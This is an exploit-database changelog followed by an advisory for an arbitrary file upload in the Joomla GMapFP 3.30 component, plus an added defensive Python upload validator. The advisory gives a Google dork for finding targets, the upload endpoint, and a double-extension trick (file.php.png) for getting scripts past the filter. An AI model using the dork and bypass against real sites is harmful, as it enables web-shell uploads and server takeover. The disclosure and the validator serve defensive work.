
7 changes to exploits/shellcodes

AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path
10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path
10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting
Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
Joomla! Component GMapFP 3.30 - Arbitrary File Upload
LeptonCMS 4.5.0 - Persistent Cross-Site Scripting
Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)
# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload
# Google Dork: inurl:''com_gmapfp''
# Date: 2020-03-25
# Exploit Author: ThelastVvV
# Vendor Homepage: https://gmapfp.org/
# Version:* Version J3.30pro
# Tested on: Ubuntu

# PoC:

http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image

# You can bypass the restriction by uploading your file as file.php.png, file2.php.jpeg, file3.html.jpg or file3.txt.jpg

# Dir File Path:

http://127.0.0.1/images/gmapfp/file.php

or

http://127.0.0.1//images/gmapfp/file.php.png

# The Joomla GMapFP component 3.x allows remote attackers to upload
# arbitrary files, including shell uploads, because file uploads are not restricted.
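
From the defender's side, the upload check that the double-extension names above get past can be written as follows. This is an added example, not code from GMapFP or from the exploit author; the allowed-extension list and the names check_upload and stored_name are assumptions.

```python
import re
import secrets

# Extensions the upload handler is meant to accept (assumed: images only).
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
# Leading bytes that identify each allowed image type.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def check_upload(filename: str, data: bytes) -> list:
    """Return the reasons to reject an upload; an empty list means accept."""
    problems = []
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any client path
    stem, dot, ext = name.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED_EXT:
        problems.append("final extension is not an allowed image type")
    elif not any(data.startswith(m) for m in MAGIC[ext]):
        problems.append("content does not match the claimed image type")
    # A dot left in the stem means a second extension (file.php.png), which
    # some web-server handler mappings still treat as a script.
    if not SAFE_STEM.fullmatch(stem):
        problems.append("name has extra extensions or unsafe characters")
    return problems


def stored_name(ext: str) -> str:
    """Server-chosen name, so nothing from the client reaches the filesystem."""
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed sample uploads, named after the cases listed in the advisory.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    samples = [("photo.png", png), ("file.php.png", b"<?php ?>"),
               ("file.php.png", png), ("file3.html.jpg", b"<html>"),
               ("file.php", b"<?php ?>")]
    for fname, body in samples:
        print(fname, "->", check_upload(fname, body) or "accept")
```

The third sample shows why a content check alone is not enough: a real PNG header with a `.php.png` name is still rejected on the name.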